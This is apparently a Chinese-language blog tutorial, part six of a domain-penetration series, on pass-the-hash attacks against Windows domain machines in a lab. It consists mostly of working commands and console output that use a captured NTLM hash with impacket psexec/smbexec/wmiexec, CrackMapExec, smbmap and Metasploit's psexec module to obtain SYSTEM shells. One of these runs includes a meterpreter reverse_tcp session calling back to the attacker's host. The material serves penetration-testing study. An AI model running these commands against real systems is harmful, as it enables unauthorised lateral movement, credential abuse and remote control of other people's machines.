域渗透学习(六)PTH 哈希传递攻击
域渗透学习(一)Windows认证机制
域渗透学习(二)Kerberos协议
域渗透学习(三)域内信息搜集
域渗透学习(四)Dump Password & Hash
域渗透学习(五)基于IPC的远程连接
PTH 哈希传递攻击
在前文Windows认证机制(网络认证 Net NTLM)章节中可以了解到,在获取了目标机器用户的NTLM Hash的情况下,可无需破解哈希直接使用目标的NTLM Hash来完成身份验证
哈希提取请参考域渗透学习(四)DUMP PASSWORD & HASH
如这里获取到的NTLM Hash 4d01fbeeaf2b706478943e0889df5622
可完成Pass The Hash的工具:
注意,PTH仍然是基于IPC远程连接实现的,所以关于账户权限,与 域渗透学习(五)基于IPC的远程连接 中提到的相同
impacket
pip3 install impacket
- psexec.py
psexec.py -hashes :<hash> 域/域用户名@192.168.10.2
- smbexec.py
smbexec.py -hashes :<hash> 域/域用户名@192.168.10.2
PS C:\Users\AresX> smbexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
- wmiexec.py
PS C:\Users\AresX> wmiexec.py -hashes :4d01fbeeaf2b706478943e0889df5622 de1ay/administrator@192.168.10.201 whoami Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] SMBv2.1 dialect used
de1ay\administrator
CrackMapExec
https://github.com/byt3bl33d3r/CrackMapExec/wiki
pip2 install crackmapexec
截止到2020/3 官方程序尚未支持Python3
Windows安装需要额外安装Microsoft Visual C++ 14.0,建议*nix环境下安装
使用CrackMapExec实现Hash传递:
aresx@XXXXXXXXXX:~$ cme smb 192.168.10.201 -u administrator -H 4d01fbeeaf2b706478943e0889df5622 -x whoami
CME 192.168.10.201:445 PC [*] Windows 6.1 Build 7601 (name:PC) (domain:DE1AY)
CME 192.168.10.201:445 PC [+] DE1AY\administrator 4d01fbeeaf2b706478943e0889df5622 (Pwn3d!) CME smb:445 XXXXXXXXXX [*] Windows 10.0 Build 18362 (name:XXXXXXXXXX) (domain:XXXXXXXXXX)
CME 192.168.10.201:445 PC [+] Executed command
CME 192.168.10.201:445 PC de1ay\administrator
[*] KTHXBYE!
Smbmap
https://github.com/ShawnDEvans/smbmap
PS E:\Tools\内网渗透工具集\smbmap> python3 .\smbmap.py -u administrator -d de1ay -p f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 -H 192.168.10.201
[+] IP: 192.168.10.201:445 Name: PC
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE 远程管理
C$ READ, WRITE 默认共享
IPC$ NO ACCESS 远程 IPC
PS E:\Tools\内网渗透工具集\smbmap>
Smbmap需提供LM Hash:NTLM Hash
Metasploit
使用的是exploit/windows/smb/psexec
注意这里填入的哈希是LM Hash:NTLM Hash
=[ metasploit v5.0.21-dev ]
+ -- --=[ 1889 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
[*] Starting persistent handler(s)...
msf5 > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf5 exploit(windows/smb/psexec) > set LPORT 7778
LPORT => 7778
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.10.201
RHOSTS => 192.168.10.201
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.10.201 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.10.1 yes The listen address (an interface may be specified)
LPORT 7778 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf5 exploit(windows/smb/psexec) > set SMBPass f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622 //冒号前为LM Hash 后为NTLM Hash
SMBPass => f471ca8ea823361ef9393d97e7a1873c:4d01fbeeaf2b706478943e0889df5622
msf5 exploit(windows/smb/psexec) > set SMBDomain de1ay
SMBDomain => de1ay
msf5 exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.10.1:7778
[*] 192.168.10.201:445 - Connecting to the server...
[*] 192.168.10.201:445 - Authenticating to 192.168.10.201:445|de1ay as user 'Administrator'...
[*] 192.168.10.201:445 - Selecting PowerShell target
[*] 192.168.10.201:445 - Executing the payload...
[+] 192.168.10.201:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.10.201
[*] Meterpreter session 1 opened (192.168.10.1:7778 -> 192.168.10.201:49482) at 2020-03-10 13:54:44 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM